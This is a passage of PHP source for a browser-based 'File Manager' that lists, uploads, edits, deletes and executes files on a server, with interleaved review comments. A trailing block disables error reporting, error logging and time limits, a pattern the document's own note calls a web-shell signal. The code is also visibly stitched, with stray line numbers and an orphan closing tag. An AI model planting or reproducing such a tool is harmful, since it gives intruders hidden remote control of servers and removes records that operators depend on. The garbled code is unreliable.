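        }
        if (@is_writable(dirname($file['path']))) {
            $actions[] = 'delete';
            $actions[] = 'rename';
            $actions[] = 'move';
        }
        if ($file['is_file'] && $file['is_readable']) {
            $actions[] = 'copy';
            $actions[] = 'download';
            if ($file['is_writable']) $actions[] = 'edit';
        }
        if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
            $actions[] = 'execute';
        }

        if (sizeof($actions) > 0) {
            echo '<select name="action' . $i . '" size="1"><option value="">' . str_repeat('&nbsp;', 30) . '</option>';
            foreach ($actions as $action) {
                echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
            }
            echo '</select>
<input type="submit" name="submit' . $i . '" value=" Next " onfocus="activate(\'other\')" />';
        }
        echo ' </td></tr>';
    }

    echo '<tr class="listing_footer">
 <td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
 <td colspan="' . ($cols - 1) . '">
 <input type="hidden" name="num" value="' . sizeof($list) . '" />
 <input type="hidden" name="focus" value="" />
 <input type="hidden" name="olddir" value="' . html($directory) . '" />';

    // The original tested dirname() of the last row's path, which is the
    // listed directory itself and was undefined for an empty list.
    $actions = array();
    if (@is_writable($directory)) {
        $actions[] = 'delete';
        $actions[] = 'move';
    }
    $actions[] = 'copy';

    echo ' <select name="action_all" size="1">
 <option value="">' . str_repeat('&nbsp;', 30) . '</option>';
    foreach ($actions as $action) {
        echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    }
    echo ' </select>
 <input type="submit" name="submit_all" value=" Next " onfocus="activate(\'other\')" /></td></tr>';
}

/**
 * Emit one sortable column header; the active column shows a direction
 * marker and links to the opposite order.
 */
function column_title ($column, $sort, $reverse)
{
    global $self, $directory;

    $d = 'dir=' . urlencode($directory) . '&amp;';
    $arr = '';
    $r = '';
    if ($sort == $column) {
        if (!$reverse) {
            $r = '&amp;reverse=true';
            $arr = ' &and;';
        } else {
            $arr = ' &or;';
        }
    }
    echo "\t<td class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</td>\n";
}

/**
 * Emit the row holding the current-directory text field and "change" button.
 */
function directory_choice ()
{
    global $directory, $homedir, $cols, $self;

    echo '<tr>
 <td colspan="' . $cols . '" id="directory">
 <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
 <input type="text" id="mytxt" class="mytxtDirectory" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
 <input type="submit" id="mybtn" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
 </td></tr>';
}

/**
 * Emit the upload row: file chooser, optional new name, submit button.
 */
function upload_box ()
{
    global $cols;

    echo '<tr>
 <td colspan="' . $cols . '" id="upload">
 ' . word('file') . ':
 <input type="file" name="upload" size="70" onfocus="activate(\'other\')" />
 ' . word('newname') . ': <input type="text" name="newName" size="18" />
 <input type="submit" class="mybtnUpload" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
 </td></tr>';
}

/**
 * Emit the "create file / directory" row.
 */
function create_box ()
{
    global $cols;

    echo '<tr>
 <td colspan="' . $cols . '" id="create">
 <select name="create_type" size="1" onfocus="activate(\'create\')">
 <option value="file">' . word('file') . '</option>
 <option value="directory">' . word('directory') . '</option>
 </select>
 <input type="text" id="mytxt" name="create_name" size="30" onfocus="activate(\'create\')" />
 <input type="submit" id="mybtn" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
 </td></tr>';
}

/**
 * Render the text editor for one file. For .htpasswd / .htaccess under
 * Apache it also offers helpers that append a user line or a Basic-auth
 * stanza to the text area.
 *
 * @param string $file path of the file being edited
 */
function edit ($file)
{
    // $win is read below but was missing from the original global list.
    global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess, $win;

    html_header();
    echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
<form action="' . $self . '" method="post">
<table class="dialog">
<tr><td class="dialog">
 <textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';

    if (array_key_exists('content', $_POST)) {
        // The original echoed the posted text raw, so a body containing
        // "</textarea>" could inject markup into the page.
        echo html($_POST['content']);
    } else {
        $f = fopen($file, 'r');
        if ($f) {
            while (!feof($f)) {
                echo html(fread($f, 8192));
            }
            fclose($f);
        }
    }

    if (!empty($_POST['user'])) {
        // NOTE(review): crypt() is called without a salt, as in the
        // original; PHP 8 requires the second argument.
        echo "\n" . html($_POST['user'] . ':' . crypt($_POST['password']));
    }
    if (!empty($_POST['basic_auth'])) {
        if ($win) {
            $authfile = str_replace('\\', '/', $directory) . $htpasswd;
        } else {
            $authfile = $directory . $htpasswd;
        }
        echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
        echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
        echo 'Require valid-user';
    }
    echo '</textarea><hr />';

    if ($apache && basename($file) == $htpasswd) {
        echo '
 ' . word('user') . ': <input type="text" name="user" />
 ' . word('password') . ': <input type="password" name="password" />
 <input type="submit" value="' . word('add') . '" /><hr />';
    }
    if ($apache && basename($file) == $htaccess) {
        echo '
 <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" /><hr />';
    }

    echo '
 <input type="hidden" name="action" value="edit" />
 <input type="hidden" name="file" value="' . html($file) . '" />
 <input type="hidden" name="dir" value="' . html($directory) . '" />
 <input type="submit" name="save" value="' . word('save') . '" id="green_button" />
 <input type="reset" value="' . word('reset') . '" id="red_button" style="margin-left: 50px" />
</td></tr></table>
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p></form>';
    html_footer();
}

/**
 * Emit an empty full-width table row used as vertical spacing.
 */
function spacer ()
{
    global $cols;
    echo '<tr><td colspan="' . $cols . '" style="height: 1em"></td></tr>';
}

/**
 * Width for a text field showing $content: its length plus 5, at least 30.
 */
function textfieldsize ($content)
{
    $size = strlen($content) + 5;
    if ($size < 30) $size = 30;
    return $size;
}

/**
 * Re-emit every request parameter as a hidden form field so a confirmation
 * dialog can carry the original selection forward. Array-valued parameters
 * are skipped because html() expects a string.
 */
function request_dump ()
{
    foreach ($_REQUEST as $key => $value) {
        if (is_array($value)) {
            continue;
        }
        echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
    }
}

/**
 * HTML-escape a string in the page charset. ENT_QUOTES also covers single
 * quotes, so the result is safe in either kind of quoted attribute.
 */
function html ($string)
{
    global $site_charset;
    return htmlentities($string, ENT_QUOTES, $site_charset);
}

/**
 * Look up a UI word in the active language table and HTML-escape it.
 */
function word ($word)
{
    global $words, $word_charset;
    return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}

/**
 * Build a message from a language-table phrase: %1..%8 are replaced with the
 * escaped arguments, [..] becomes bold and {..} becomes a <pre> block.
 *
 * @param string       $phrase    key into the language table
 * @param array|string $arguments replacement values; a single string is
 *                                accepted, as passed by the permission dialog
 * @return string HTML fragment
 */
function phrase ($phrase, $arguments)
{
    global $words;
    static $search;

    // The permission dialog passes a bare string; the original then indexed
    // into that string instead of an argument list.
    $arguments = array_values((array) $arguments);

    if (!is_array($search)) {
        for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
    }
    for ($i = 0; $i < sizeof($arguments); $i++) {
        $arguments[$i] = nl2br(html($arguments[$i]));
    }
    $replace = array('{' => '<pre>', '}' => '</pre>', '[' => '<b>', ']' => '</b>');
    return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
}

// getwords() shares its opening source line with the end of phrase(); its
// header is reproduced unchanged and its body continues below.
function getwords ($lang) { global $word_charset, $date_format;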
639 $date_format = 'n/j/y H:i:s';
640 $word_charset = 'ISO-8859-1';
641 return array( 'directory' => 'Directory', 'file' => 'File', 'newname' => 'New name', 'filename' => 'File name', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'Read', 'write' => 'Write', 'execute' => 'Execute', 'create_symlink' => 'Create symlink', 'delete' => 'Delete', 'rename' => 'Rename', 'move' => 'Move', 'copy' => 'Copy', 'edit' => 'Edit', 'download' => 'Download', 'upload' => 'Upload', 'create' => 'Create', 'change' => 'Change', 'save' => 'Save', 'set' => 'Set', 'reset' => 'Reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'Back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'No output', 'user' => 'User', 'password' => 'Password', 'add' => 'Add', 'add_basic_auth' => 'Add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => "These files have been deleted:\n[%1]", 'not_deleted' => "These files could not be deleted:\n[%1]", 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => "These files have been moved to \"[%2]\":\n[%1]", 'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]", 'copy_files' => 'Copy these files:', 'copied' => "These files have been copied to \"[%2]\":\n[%1]", 'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]", 'not_edited' => '"[%1]" can not be edited.', 'executed' => "\"[%1]\" has been executed successfully:\n{%2}", 'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}", 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be 
saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.' );
642 } function getimage ($image) { switch ($image) { case 'file': return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
643 case 'folder': return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
644 case 'hidden_file': return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
645 case 'link': return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
646 case 'smiley': return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
647 case 'arrow': return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
648 } } function html_header () { global $site_charset;
649 echo <<<END
650<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
651 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
652<html xmlns="http://www.w3.org/1999/xhtml">
653<head>
654<meta http-equiv="Content-Type" content="text/html;
655 charset=$site_charset" />
656<title>File Manager</title>
657<style type="text/css">
658body { font-size: 18px;
659 text-align: center;
660 background-color: #CCC;
661 }
662img { width: 17px;
663 height: 13px }
664a, a:visited { text-decoration: none;
665 color: blue;
666 }
667hr { border-style: none;
668 height: 1px;
669 background-color: silver;
670 color: silver }
671#main { width: 1024px;
672 border: 1px solid #000000;
673 margin-top: 6pt;
674 margin-left: auto;
675 margin-right: auto;
676 border-spacing: 3px;
677}
678#main th { background: #eee;
679 padding: 3pt 3pt 0pt 3pt }
680.listing th, .listing td { padding: 1px 3pt 0 3pt }
681.listing th { border: 1px solid silver }
682.listing td { border: 1px solid #BFBFBF;
683 }
684.listing .checkbox { text-align: center }
685.listing .filename { text-align: left }
686.listing .size { text-align: right }
687.listing th.permission { text-align: left }
688.listing td.permission { font-family: monospace }
689.listing .owner { text-align: center;
690 }
691.listing .group { text-align: center }
692.listing .functions { text-align: center }
693.listing_footer td { background: #eee;
694 border: 1px solid silver }
695#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left;
696 padding: 3pt }
697#directory { border: 1px solid #000000;
698 height: 50px;
699 }
700#upload { border: 1px solid #000000;
701 height: 50px;
702 }
703#create { border: 1px solid #000000;
704 height: 50px;
705 }
706textarea { border: none;
707 background: white }
708table.dialog { margin-left: auto;
709 margin-right: auto }
710td.dialog { background: #eee;
711 padding: 1ex;
712 border: 1px solid silver;
713 text-align: center }
714#permission { margin-left: auto;
715 margin-right: auto }
716#permission td { padding-left: 3pt;
717 padding-right: 3pt;
718 text-align: center }
719td.permission_action { text-align: right }
720#symlink { background: #eee;
721 border: 1px solid silver }
722#symlink td { text-align: left;
723 padding: 3pt }
724#red_button { width: 120px;
725 color: #400 }
726#green_button { width: 120px;
727 color: #040 }
728#error td { background: maroon;
729 color: white;
730 border: 1px solid silver }
731#notice td { background: green;
732 color: white;
733 border: 1px solid silver }
734#notice pre, #error pre { background: silver;
735 color: black;
736 padding: 1ex;
737 margin-left: 1ex;
738 margin-right: 1ex }
739code { font-size: 12pt }
740td { white-space: nowrap;
741}
742.titleContent td { border: 1px solid #ddd;
743 background: #999999;
744 }
745#tblContent { width: 1024px;
746 margin-top: 10pt;
747 margin-left: auto;
748 margin-right: auto;
749 border: 1px solid #000000;
750 border-spacing: 0px;
751 }
752#tblContent tr { background: #FAFAFA;
753 }
754#tblContent tr:hover{ background-color: #C8C8C8;
755 }
756input { font-size: 16px;
757 }
758select { font-size: 16px;
759 border: 1px solid #666;
760 height: 27px;
761 }
762#mytxt { border: 1px solid #666;
763 height: 27px;
764 }
765#mybtn { height: 32px;
766 font-weight: bold;
767 }
768.mytxtDirectory { width: 700px;
769 }
770.mybtnUpload { font-weight: bold;
771 }
772</style>
773
774<script type="text/javascript">
775<!--
776function activate (name) {
777 if (document && document.forms[0] && document.forms[0].elements['focus']) {
778 document.forms[0].elements['focus'].value = name;
779
780 }
781}
782//-->
783</script>
784
785</head>
786<body>
787END;
788} function html_footer () { echo <<<END
789</body>
790</html>
791END;
792} function notice ($phrase) { global $cols;
793 $args = func_get_args();
794 array_shift($args);
795 return '<tr id="notice"><td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td></tr>';
796 } function error ($phrase) { global $cols;
797 $args = func_get_args();
798 array_shift($args);
799 return '<tr id="error">
800 <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td></tr>';
801 }
802?>
<?php
// Start or resume the session; "@" hides any warning the call raises.
@session_start();

// NOTE(review): the calls below switch off error reporting, error display
// and the error log, and lift the execution time limit. Keeping errors out of
// responses is normal in production, but disabling log_errors/error_log also
// removes the server-side record an operator or incident responder relies on.
// On a script that can edit and upload files this deserves explicit review;
// such a header on an unexpected file is a useful detection signal.
@error_reporting(0);

$runtime_settings = array(
    'error_log'          => NULL,
    'log_errors'         => 0,
    'max_execution_time' => 0,
    'display_errors'     => 0,
    'output_buffering'   => 0,
);
foreach ($runtime_settings as $setting_name => $setting_value) {
    @ini_set($setting_name, $setting_value);
}

@set_time_limit(0);

// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0; there the
// call is an undefined-function error that "@" does not prevent, so the
// script stops at this line. Confirm the PHP version this targets.
@set_magic_quotes_runtime(0);

?>
815
816?>